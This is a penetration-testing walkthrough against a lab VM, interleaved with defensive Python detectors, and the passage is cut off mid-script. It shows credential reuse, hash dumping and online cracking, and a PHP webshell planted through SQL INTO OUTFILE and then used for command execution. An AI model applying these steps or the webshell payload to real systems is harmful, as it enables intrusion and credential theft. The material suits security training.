

Penetration Testing Showcase - DEICE-S1.140
Author - Raluca Blidaru

Are penetration testing phases different from the ones of a malicious attack? The answer is no. Both malicious attackers and penetration testers go through the same stages or phases in their attacks/tests:
1. Gathering Information phase. During this stage, as much data as possible about the target is collected (e.g. the target IP address range, domain name registration records, mail server records, etc.), in order to build a blueprint of the target.
2. Scanning phase. The target is scanned for entry points such as wireless access points, Internet gateways, available systems, running services, known vulnerabilities, and listening ports. Other tests check whether default user IDs, passwords, and guest passwords have been disabled or changed, and that no remote login is allowed.
3. Gaining Access phase. Based on the vulnerabilities identified during scanning, attempts are made to access the system. To accomplish this task, one could use automated exploit tools, or legitimate information obtained through social engineering.
4. Maintaining Access phase. Once access has been acquired, attempts are made to escalate privileges to root/admin and then to upload a piece of code (also called a “backdoor”) onto the target, so that access is maintained independently of the authorized entry points into the system/network. This allows the tester to reconnect to the target at any time.
5. Covering Tracks phase. This phase is as important as the previous ones: a mark left behind can show how elevated access to protected resources was obtained, and that information could later be misused by others with access to the system. This phase involves restoring the system to its normal pre-test configuration, which includes removing files, cleaning logs and registry entries, deleting the uploaded backdoor, etc.

Please note that an effective penetration exercise, malicious or not, follows these phases, but it is very likely that the tester (or the attacker) will move back and forth between these steps, depending on the discoveries that are made. For example, if an exploitable flaw is identified during the information gathering phase, it may be used immediately to gain access to the target, without scanning it first. In this case, the scanning is performed after the Gaining Access phase.

Now it’s time to showcase.
The example I am proposing mimics a real-life scenario, where an enterprise hires a security professional to test their systems/network to prove that internal confidential data is properly protected. In these types of engagements, no additional information is provided to the assessor.
The action is happening in my Virtual Test Lab.



======================= VIRTUAL TEST LAB =======================
|   ==== 192.168.100.130 =====    ==== 192.168.100.138 =====   |
|   |                        |    |                        |   |
|   |        KALI VM         |    |       TARGET VM        |   |
|   |                        |    |                        |   |
|   ==========================    ==========================   |
================================================================


I am performing a penetration test against one machine about which I have very little information. All I know is that a sensitive file is located under the root/admin home folder. Can I get it? I think so, but let’s see how, step by step, following the phased approach described in the introductory part of this article.

1. Gathering Information phase:
a) Let’s find the IP of the Target machine. All of the tools used returned the same information. The IP of the Target machine is 192.168.100.138:
root@kali:~# fping -a -g 192.168.100.2 192.168.100.253 2> /dev/null
192.168.100.130                     (this is my KALI machine)
192.168.100.138                     (this is the Target machine)
root@kali:~#



root@kali:~# nmap -sS 192.168.100.2-253
Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-17 22:49 EDT
Nmap scan report for 192.168.100.138    (this is the Target machine)
Host is up (0.0011s latency).
Not shown: 993 filtered ports
PORT    STATE  SERVICE
21/tcp  open   ftp
22/tcp  open   ssh
80/tcp  open   http
443/tcp open   https
465/tcp closed smtps
993/tcp open   imaps
995/tcp open   pop3s
MAC Address: 00:0C:29:E6:5B:22 (VMware)
Nmap scan report for 192.168.100.130
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.100.130 are closed
Nmap done: 256 IP addresses (4 hosts up) scanned in 38.67 seconds
root@kali:~#


root@kali:~# netdiscover -i eth0 -r 192.168.100.0/24 -p
Currently scanning: (passive)   |   Screen View: Unique Hosts                
212 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 12720          
 _____________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.100.1   00:50:56:c0:00:00    62    3720   VMWare, Inc.               
 192.168.100.138 00:0c:29:e6:5b:22    53    3180   VMware, Inc. (this is the Target machine)               
 192.168.100.254 00:50:56:ec:1e:5e    88    5280   VMWare, Inc.               
 0.0.0.0         00:50:56:c0:00:00    09    540   VMWare, Inc.                
root@kali:~#


b) Ports 80 and 443 are open. Is any web application running on the Target machine? Yes, there is:

==== http://192.168.100.138 ====================================
|                          Welcome to                          |
|                       Lazy Admin Corp.                       |
|                         HackingLab!                          |
|                                                              |
|  You are employed by the management of LazyAdmin corp. to    |
|  PenTest their Network. At this point you have managed to    |
|  successfully break into the network. The goal is now to     |
|  find and extract sensitive information.                     |
|                                                              |
|       "I choose a lazy person to do a hard job.              |
|    Because a lazy person will find an easy way to do it."    |
|                        ~ Bill Gates                          |
================================================================


c) Let’s take a look at the source code of this page. It includes a section that is not displayed to the end-user. It refers to a (web) forum that is “new” but available to the end-users, and it includes recommendations about the use of passwords.

...
<font class="hidden">
1. Have you seen our new cool forum yet?<br><br>
2. Do not post sensitive information to public!<br><br>
3. Different passwords for different services. What is that for?!<br><br>
4. What if you are able to break out of your cell and manage to enter another one?<br><br>
5. Some things change from time to time, others don't.<br><br>
6. Sorry, no more hints available. There where more before we had to restore a very old backup. :(</font>



d) How do we access this “forum”? Let’s try it, assuming that the path is “forum”. It works:
==== http://192.168.100.138/forum ==============================
|   LazyAdmin corp.                Log in | Register | Users   |
|                                                              |
|   ...                                                        |
================================================================


e) The “Users” page provides a list of users with access to the “Forum”. They are: admin, MBrown, RHedley, SWillard.

f) Going back to the main page, we find that this forum is public: anyone can read the messages posted, and not all of them should be classified as “public” information. The first message in the “Login Attacks” thread includes an extract from the authentication log file, showing unsuccessful logins, but not only that:

...
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
Mar 7 11:15:32 testbox sshd[5772]: Connection closed by 10.0.0.23 [preauth]
Mar 7 11:15:32 testbox sshd[5772]: Set /proc/self/oom_score_adj to 0
Mar 7 11:15:31 testbox sshd[5783]: Connection from 10.10.2.131 port 47651
Mar 7 11:15:32 testbox sshd[5779]: Invalid user bbanter from 10.10.2.131
Mar 7 11:15:32 testbox sshd[5779]: input_userauth_request: invalid user bbanter [preauth]
Mar 7 11:15:32 testbox sshd[5779]: pam_unix(sshd:auth): check pass; user unknown
Mar 7 11:15:32 testbox sshd[5779]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.10.2.131
Mar 7 11:15:32 testbox sshd[5775]: Failed password for invalid user benedictb from 10.10.2.131 port 46963 ssh2
Mar 7 11:15:32 testbox sshd[5768]: Failed password for invalid user genniege from 10.10.2.131 port 46488 ssh2
Mar 7 11:15:32 testbox sshd[5775]: Received disconnect from 10.10.2.131: 11: Bye Bye [preauth]
Mar 7 11:15:32 testbox sshd[5768]: Received disconnect from 10.10.2.131: 11: Bye Bye [preauth]
Mar 7 11:15:32 testbox sshd[5774]: Connection from 10.0.0.23 port 35155
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar 7 11:15:32 testbox sshd[5774]: pam_unix(sshd:session): session opened for user mbrown by (uid=0)
...


What do we learn from this? Two connections were initiated from the same IP address, 10.0.0.23: one unsuccessful, under the username “!DFiuoTkbxtdk0!”, and the other under the username “mbrown”, which succeeded. What are the chances that this is a valid username and password pair? Very high: as has happened to many of us, the user most likely typed the password into the username field when trying to log in. Of course, it still needs to be proved that this is the case here, so let’s give it a try. What are these credentials for? They are for connecting remotely, using “ssh”.
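The log excerpt above is exactly the kind of record a defender should be scanning for: a high-entropy “username” followed by a successful login from the same source usually means a password was just written to a log that may be world-readable or, as here, posted in public. The following detector is an added example and is not part of the original post; the log lines it parses are constructed after the excerpt, and the secret-likeness heuristic is an assumption of mine rather than a published rule.

```python
# Added example (not from the original post): flag "Invalid user" names in
# sshd logs that look like a password typed into the username field, and
# correlate them with a later successful login from the same source IP.
# The sample lines below are constructed after the excerpt quoted above.
import re
from collections import defaultdict

SAMPLE_LOG = """\
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: Connection closed by 10.0.0.23 [preauth]
Mar 7 11:15:32 testbox sshd[5779]: Invalid user bbanter from 10.10.2.131
Mar 7 11:15:32 testbox sshd[5775]: Failed password for invalid user benedictb from 10.10.2.131 port 46963 ssh2
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
"""

INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (\S+) from (\d+(?:\.\d+){3})")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\d+(?:\.\d+){3})")


def looks_like_secret(name):
    """Heuristic (assumption): account names are short and mostly lowercase
    letters; a long string mixing case, digits and punctuation is far more
    likely to be a password that landed in the wrong field."""
    if len(name) < 8:
        return False
    classes = sum([
        any(c.islower() for c in name),
        any(c.isupper() for c in name),
        any(c.isdigit() for c in name),
        any(not c.isalnum() for c in name),
    ])
    return classes >= 3


def redact(secret):
    """Never echo a suspected password in full into a ticket or SIEM alert."""
    return secret[:2] + "*" * (len(secret) - 2)


def find_leaked_secrets(log_text):
    """Return (source_ip, redacted_secret, accepted_user_or_None) tuples.

    A suspected secret followed by an accepted login from the same IP is the
    strongest signal: the user most likely retyped the pair correctly, and
    the password now sits in the log.  Unmatched suspects are reported too,
    because the password still deserves rotation.
    """
    pending = defaultdict(list)   # source IP -> suspected secrets not yet matched
    findings = []
    for line in log_text.splitlines():
        m = INVALID_RE.search(line)
        if m:
            name, ip = m.groups()
            if looks_like_secret(name):
                pending[ip].append(name)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.groups()
            for secret in pending.pop(ip, []):
                findings.append((ip, redact(secret), user))
    for ip, names in pending.items():
        for secret in names:
            findings.append((ip, redact(secret), None))
    return findings


if __name__ == "__main__":
    for ip, secret, user in find_leaked_secrets(SAMPLE_LOG):
        print(f"{ip}: suspected password {secret!r} in username field"
              + (f", later accepted login as {user}" if user else ""))
```

Running it against the constructed sample reports the 10.0.0.23 pair and nothing for the ordinary brute-force names, which is the point: the finding is a credential to rotate, not a noisy failed-login count.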

2. Gaining Access phase:
a) The remote access was not successful. A public/private key pair is required:
root@kali:~# ssh mbrown@192.168.100.138
The authenticity of host '192.168.100.138 (192.168.100.138)' can't be established.
ECDSA key fingerprint is 0b:33:73:4c:74:a2:1e:97:8c:87:bd:65:42:c9:86:7a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.100.138' (ECDSA) to the list of known hosts.
Permission denied (publickey).
root@kali:~# 

b) We can try the “Forum”, testing whether the same pair of credentials gives us access. And it does. We are logged in as “MBrown”.

3. Gathering Information phase:
a) Being logged in as “MBrown”, we edit the profile of this user, and the email address for this user is there: mb@lazyadmin.corp. Does it follow a pattern? If so, then the other users’ addresses will be: rh@lazyadmin.corp and sw@lazyadmin.corp. But for the moment this is just an assumption. It needs to be proved.

b) At step 1.a, when we performed the “nmap” scan, port 993 was shown as open, with the IMAP service running on it. Let’s try to connect remotely to this email service. The following sequence of commands is used for reading emails from any of M. Brown’s mailboxes:
root@kali:~# openssl s_client -connect 192.168.100.138:993 -crlf
...
1 login mb@lazyadmin.corp  !DFiuoTkbxtdk0!
...
2 list "" "*"
...
3 select "INBOX"                    (repeated for "INBOX.Drafts" and "INBOX.Sent")
...
4 fetch 1 all
...
5 fetch 1 body[]
...
root@kali:~# 

And three (3) emails addressed to M. Brown were downloaded from the server:
...
Date: Sat, 16 Mar 2013 20:19:41 +0100
Subject: Audit
From: sw@lazyadmin.corp
To: mb@lazyadmin.corp
User-Agent: SquirrelMail/1.4.22
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal

Hi Mark,

last we have made a password audit for all of our systems and we have seen that you are using the same password for a few services.
Please be so kind and change your passwords. Please keep in mind to use different passwords for different services. :)

Thank you!
Sandy

Closed
root@kali:~# 

...
Date: Sun, 10 Mar 2013 09:23:13 +0100
Subject:
From: sw@lazyadmin.corp
To: mb@lazyadmin.corp
User-Agent: SquirrelMail/1.4.22
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal

Hi,

here are the login-informations for mysql:

Username: root
Password: S4!y.dk)j/_d1pKtX1

Regards,
Sandy

Closed
root@kali:~# 

...
Date: Sun, 10 Mar 2013 09:24:53 +0100
Subject: Re:
From: mb@lazyadmin.corp
To: sw@lazyadmin.corp
User-Agent: SquirrelMail/1.4.22
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal

Thank you!

> Hi,
>
> here are the login-informations for PHPMyAdmin:
>
> Username: root
> Password: S4!y.dk)j/_d1pKtX1
>
> Regards,
> Sandy
>
>

Closed
root@kali:~# 


Before moving further, let’s pause and review what we’ve got so far:
A. We have a pair of credentials to log into the “Forum”;
B. The same password gave us access to the email service;
C. From the email service we’ve learned about another set of credentials, used to access the phpMyAdmin service and to connect to the MySQL database.
All of this tells us that there are multiple services running on the box. Instead of guessing how to access them, we should first scan the system to see which of them are reachable from the outside world.

4. Scanning phase:
a) Scanning the web interfaces is easy with fuzzing, using either the “wfuzz” or the “dirb” tool, both available in Kali. Because of our focus, we will explore both port 80 and port 443. As we’ll see below, the web interfaces dedicated to administration services or to accessing private information are available only through HTTPS, with the intention of protecting the data transferred between the end-user and the corresponding portal while in transit through the network.

root@kali:~# wfuzz --hc 404 -c -z file,/usr/share/dirb/wordlists/common.txt http://192.168.100.138/FUZZ
********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************
Target: http://192.168.100.138/FUZZ
Payload type: file,/usr/share/dirb/wordlists/common.txt
Total requests: 4594
==================================================================
ID    Response   Lines      Word         Chars          Request   
==================================================================
00014:  C=403      8 L          22 W        211 Ch      " - .htaccess"
00009:  C=403      8 L          22 W        211 Ch      " - .htpasswd"
00010:  C=403      8 L          22 W        206 Ch      " - .hta"
00948:  C=403      8 L          22 W        210 Ch      " - cgi-bin/"
01759:  C=301      7 L          20 W        237 Ch      " - forum"
02087:  C=200    143 L         226 W       1782 Ch      " - index"
02088:  C=200    143 L         226 W       1782 Ch      " - index.html"
03594:  C=403      8 L          22 W        215 Ch      " - server-status"
root@kali:~#


root@kali:~# wfuzz --hc 404 -c -z file,/usr/share/dirb/wordlists/common.txt https://192.168.100.138/FUZZ
********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************
Target: https://192.168.100.138/FUZZ
Payload type: file,/usr/share/dirb/wordlists/common.txt
Total requests: 4594
==================================================================
ID    Response   Lines      Word         Chars          Request   
==================================================================
00001:  C=403      8 L          22 W        211 Ch      " - .htaccess"
00006:  C=403      8 L          22 W        211 Ch      " - .htpasswd"
00007:  C=403      8 L          22 W        206 Ch      " - .hta"
00946:  C=403      8 L          22 W        210 Ch      " - cgi-bin/"
01764:  C=301      7 L          20 W        238 Ch      " - forum"
02090:  C=200    143 L         226 W       1782 Ch      " - index"
02094:  C=200    143 L         226 W       1782 Ch      " - index.html"
03006:  C=301      7 L          20 W        243 Ch      " - phpmyadmin"
03599:  C=403      8 L          22 W        215 Ch      " - server-status"
04379:  C=301      7 L          20 W        240 Ch      " - webmail"
root@kali:~#



root@kali:~# dirb http://192.168.100.138/
-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Sun Oct 18 10:56:57 2015
URL_BASE: http://192.168.100.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592                                                         
---- Scanning URL: http://192.168.100.138/ ----
+ http://192.168.100.138/cgi-bin/ (CODE:403|SIZE:210)                                                 
==> DIRECTORY: http://192.168.100.138/forum/                                                          
+ http://192.168.100.138/index (CODE:200|SIZE:1782)                                                   
+ http://192.168.100.138/index.html (CODE:200|SIZE:1782)                                              
+ http://192.168.100.138/server-status (CODE:403|SIZE:215)                                            
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/ ----
+ http://192.168.100.138/forum/LICENSE (CODE:200|SIZE:33093)                                          
+ http://192.168.100.138/forum/README (CODE:200|SIZE:730)                                             
==> DIRECTORY: http://192.168.100.138/forum/backup/                                                   
==> DIRECTORY: http://192.168.100.138/forum/config/                                                   
==> DIRECTORY: http://192.168.100.138/forum/images/                                                   
==> DIRECTORY: http://192.168.100.138/forum/includes/                                                 
+ http://192.168.100.138/forum/index (CODE:200|SIZE:7348)                                             
+ http://192.168.100.138/forum/index.php (CODE:200|SIZE:7348)                                         
==> DIRECTORY: http://192.168.100.138/forum/install/                                                  
==> DIRECTORY: http://192.168.100.138/forum/js/                                                       
==> DIRECTORY: http://192.168.100.138/forum/lang/                                                     
==> DIRECTORY: http://192.168.100.138/forum/modules/                                                  
==> DIRECTORY: http://192.168.100.138/forum/templates_c/                                              
==> DIRECTORY: http://192.168.100.138/forum/themes/                                                   
==> DIRECTORY: http://192.168.100.138/forum/update/                                                   
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/backup/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/install/ ----
+ http://192.168.100.138/forum/install/index (CODE:302|SIZE:0)                                        
+ http://192.168.100.138/forum/install/index.php (CODE:302|SIZE:0)                                    
+ http://192.168.100.138/forum/install/install (CODE:200|SIZE:12898)                                  
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/templates_c/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/update/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                            
-----------------
DOWNLOADED: 13776 - FOUND: 11
root@kali:~#


root@kali:~# dirb https://192.168.100.138/
-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Sun Oct 18 10:39:33 2015
URL_BASE: https://192.168.100.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592                                                         
---- Scanning URL: https://192.168.100.138/ ----
+ https://192.168.100.138/cgi-bin/ (CODE:403|SIZE:210)                                                
==> DIRECTORY: https://192.168.100.138/forum/                                                         
+ https://192.168.100.138/index (CODE:200|SIZE:1782)                                                  
+ https://192.168.100.138/index.html (CODE:200|SIZE:1782)                                             
==> DIRECTORY: https://192.168.100.138/phpmyadmin/                                                    
+ https://192.168.100.138/server-status (CODE:403|SIZE:215)                                           
==> DIRECTORY: https://192.168.100.138/webmail/                                                       
                                                                                                      
---- Entering directory: https://192.168.100.138/forum/ ----
+ https://192.168.100.138/forum/LICENSE (CODE:200|SIZE:33093)                                         
+ https://192.168.100.138/forum/README (CODE:200|SIZE:730)                                            
==> DIRECTORY: https://192.168.100.138/forum/backup/                                                  
==> DIRECTORY: https://192.168.100.138/forum/config/                                                  
==> DIRECTORY: https://192.168.100.138/forum/images/                                                  
==> DIRECTORY: https://192.168.100.138/forum/includes/                                                
+ https://192.168.100.138/forum/index (CODE:200|SIZE:7348)                                            
+ https://192.168.100.138/forum/index.php (CODE:200|SIZE:7348)                                        
==> DIRECTORY: https://192.168.100.138/forum/install/                                                 
==> DIRECTORY: https://192.168.100.138/forum/js/                                                      
==> DIRECTORY: https://192.168.100.138/forum/lang/                                                    
==> DIRECTORY: https://192.168.100.138/forum/modules/                                                 
==> DIRECTORY: https://192.168.100.138/forum/templates_c/                                             
==> DIRECTORY: https://192.168.100.138/forum/themes/                                                  
==> DIRECTORY: https://192.168.100.138/forum/update/

---- Entering directory: https://192.168.100.138/phpmyadmin/ ----
+ https://192.168.100.138/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                
+ https://192.168.100.138/phpmyadmin/index.php (CODE:200|SIZE:7540)
...
root@kali:~#


5. Gaining Access phase:
a) Next we connect to the phpMyAdmin interface (https://192.168.100.138/phpmyadmin/) using the credentials found in the email: username = “root”, password = “S4!y.dk)j/_d1pKtX1”. Access is granted. Exploring the databases in the list and their content is the next logical step, to gather more information on the system.

6. Gathering Information phase:
a) Looking for valid credentials:

SELECT `user_name`, `user_pw` FROM `mlf2_userdata`;    -- forum
admin         fd339d53bf599d4ec7281ace84a902dc2ca16c7f63cbb16261
RHedley     31cbbdab9f5e1ebfa7d81267c258e29b5f9e171e6fcf7b1ba3
MBrown      8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1
SWillard      c19038340b8f5d1fc70e9bfbc3336f7bf1e0935da5ef13d4ef

SELECT `username`, `password` FROM `mailbox`;   -- mail
rh@lazyadmin.corp     20f1275ce5e67be2c06476333b68f585
sw@lazyadmin.corp     07255e7701a86ad1672765d15082f1a3
mb@lazyadmin.corp     d768176c4486ce77787c73883406fe97
mp@lazyadmin.corp     fa514a9f39391658b15d5db542029aa6

SELECT `User`, `Password` FROM `user`;   -- mysql
root              *05DE4B3ED9B4F36FAAEC8EF25689468318481FEB
debian-sys-maint     *27F84EF9FAA0E841963E4963EFC8D0EC7443A820
phpmyadmin         *1E8775B9D4F8EF5A6722E7E0C57BA5985872FB98
mail             *0616BA40862AA9B5B194CD196808176F644B2828
forum             *FEAFF5308E872DB9CFBB7585CD62CB7383B53E75

b) We found a lot of passwords, but all of them hashed. Let’s try to crack them. The thought here is that we may be able to use these credentials to connect remotely to the target machine, via the ftp or ssh services, or locally from a shell. We’ll do it in the simplest way, using online tools:
http://www.hashkiller.co.uk/md5-decrypter.aspx

20f1275ce5e67be2c06476333b68f585 MD5 : tum-ti-tum      
07255e7701a86ad1672765d15082f1a3 MD5 : Austin-Willard   
d768176c4486ce77787c73883406fe97 [Not found]       
                            //but we know this one:   !DFiuoTkbxtdk0!
fa514a9f39391658b15d5db542029aa6 [Not found]   


7. Maintaining Access phase:
a) So far, we were able to remotely access a few services on the target system, but we were using the credentials of one of the authorized users. If that account is closed, or its password changed, we lose all the control we have gained on the target. This is the reason why we should look into creating our own backdoor into the system: we’ll upload a webshell on the server and from there we’ll run OS commands.

Here are the steps:
  1. find a writable directory – searching through the outputs from step 4.a, we get a list of folders that could potentially be listed (look for the comment “(!) WARNING: Directory IS LISTABLE. No need to scan it.”). We load the URLs in the browser, one by one, and test them, looking at the content of the files. Preferably we find a folder that already lists PHP files, which we’ll use to host a PHP webshell of our choice. A good candidate is “https://192.168.100.138/forum/templates_c/”.
  2. find SQL injection – using the phpMyAdmin interface, we test whether we can successfully run the following command, which saves the output of the SELECT statement into the “cmd_test.php” file. If the SQL statement executes with no errors, then the new file should be listed at the URL identified above, and referenced here again: “https://192.168.100.138/forum/templates_c/”.
SELECT `user_name` FROM `mlf2_userdata` WHERE `user_id`=1 UNION
SELECT "This is a test" into outfile "/var/www/forum/templates_c/cmd_test.php";

  3. upload the webshell – similar to the above, but running the next command instead:
SELECT `user_name` FROM `mlf2_userdata` WHERE `user_id`=1 UNION
SELECT "<? System($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/forum/templates_c/cmd.php";

And BINGO: when requesting the following URL, the content of the / directory is listed:
http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls / -all
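The two things that made the steps above possible were a database account with the FILE privilege and a MySQL server whose secure_file_priv left INTO OUTFILE unrestricted. The following script is an added example, not part of the original post: it scans general-query-log lines for file writes landing under the web root and interprets the secure_file_priv value that would have stopped them. The log lines are constructed (the webshell body is replaced by a placeholder); the web root path follows the post.

```python
# Added example (not from the original post): detect SELECT ... INTO
# OUTFILE / DUMPFILE writes into a web document root in the MySQL general
# query log, and classify the secure_file_priv setting.  Log lines are
# constructed; the document root path is the one used in the post.
import re

WEB_ROOTS = ("/var/www/",)
# general log line: "YYMMDD HH:MM:SS <thread id> Query <statement>"
LOG_RE = re.compile(r"^\d{6}\s+[\d:]+\s+(\d+)\s+Query\s+(.*)$")
OUTFILE_RE = re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s+['\"]([^'\"]+)['\"]",
                        re.IGNORECASE)

SAMPLE_GENERAL_LOG = """\
151018 11:02:13    12 Connect   root@localhost on forum
151018 11:02:14    12 Query     SELECT `user_name` FROM `mlf2_userdata` WHERE `user_id`=1
151018 11:02:40    12 Query     SELECT "This is a test" into outfile "/var/www/forum/templates_c/cmd_test.php"
151018 11:03:02    12 Query     SELECT "<?php ... ?>" INTO OUTFILE "/var/www/forum/templates_c/cmd.php"
151018 11:05:10    13 Query     SELECT * FROM report INTO OUTFILE '/var/lib/mysql-files/report.csv'
"""


def find_file_writes(log_text):
    """Return one dict per server-side file write found in the general log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        thread, statement = m.groups()
        w = OUTFILE_RE.search(statement)
        if not w:
            continue
        path = w.group(2)
        findings.append({
            "thread": thread,
            "path": path,
            "in_web_root": path.startswith(WEB_ROOTS),
            # any file the web server will hand to the PHP interpreter
            "server_side_code": path.lower().endswith((".php", ".phtml", ".php5")),
        })
    return findings


def critical_writes(log_text):
    """Writes that drop executable server-side code into the web root:
    the pattern that produced cmd.php above."""
    return [f for f in find_file_writes(log_text)
            if f["in_web_root"] and f["server_side_code"]]


def outfile_policy(secure_file_priv):
    """Interpret the value of SHOW VARIABLES LIKE 'secure_file_priv'.

    NULL disables LOAD DATA / INTO OUTFILE entirely; an empty string allows
    writes anywhere the mysqld process can write (the setting the webshell
    step relies on); a directory restricts file I/O to that directory.
    """
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return "disabled"
    if secure_file_priv == "":
        return "unrestricted"
    return "restricted"


if __name__ == "__main__":
    for f in critical_writes(SAMPLE_GENERAL_LOG):
        print(f"thread {f['thread']} wrote server-side code to {f['path']}")
    print("secure_file_priv='' is", outfile_policy(""))
```

The same two classification functions apply to an audit log exported from the server; the log file itself is only available if the general log was enabled, so the secure_file_priv check is the one that works on every server.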

b) Let’s search for more information that could lead us to privilege escalation and to the file located under the root folder. We’ll start by listing the contents of the home folders of the users on the system, searching for clues:

http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls /home/ftp -all
total 0
drwxrwxr-x+ 1 root root 60 May 14 2013 .
drwxr-xr-x 1 root root 100 Apr 3 2013 ..
d-wxrwx-wx+ 1 ftp ftpadmin 60 May 13 2013 incoming   


http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls /home/sraines -all
total 0
drwxr-xr-x 2 1000 1000 36 May 12 2013 .
drwxr-xr-x 1 root root 100 Apr 3 2013 ..
-rw-r--r-- 1 root root 0 May 12 2013 .bash_history   

We observe that there is an “incoming” folder owned by the “ftp” user, and every user on the system has “write” and “execute” permissions on this folder, but no “read” permission. Is there any way to connect to it as the “ftp” user to gain access to the content of this folder?

c) Let’s continue exploring the system files, and specifically the “/etc/group” file. As we can see, some of the users on the target machine are authorized to use the “ftp” service and/or the “ssh” service, or even have privileged permissions on the system (“sudo”):

http://192.168.100.138/forum/templates_c/cmd.php?cmd=cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:swillard
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
fuse:x:104:
messagebus:x:105:
whoopsie:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
netdev:x:110:
lpadmin:x:111:
sambashare:x:112:
mysql:x:113:
ssl-cert:x:114:
dovecot:x:115:
postfix:x:116:
postdrop:x:117:
memcache:x:118:
ftpuser:x:997:rhedley,mbrown,ftp
ftpadmin:x:999:rhedley,swillard
sshlogin:x:998:swillard,mbrown
mbrown:x:1001:
rhedley:x:1002:
swillard:x:1003:
mparker:x:1004:
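The group file and the directory listing above are the two inputs of a routine access review: which accounts hold remote-access or administrative group memberships, and which directories anyone on the box can write into. The script below is an added example, not part of the original post; its sample data is a constructed subset of the listings shown above, and the set of groups treated as sensitive is my assumption for this host.

```python
# Added example (not from the original post): a small access review over
# /etc/group content and "ls -l" mode strings, flagging the memberships and
# directory permissions that matter in the listings above.  Sample data is a
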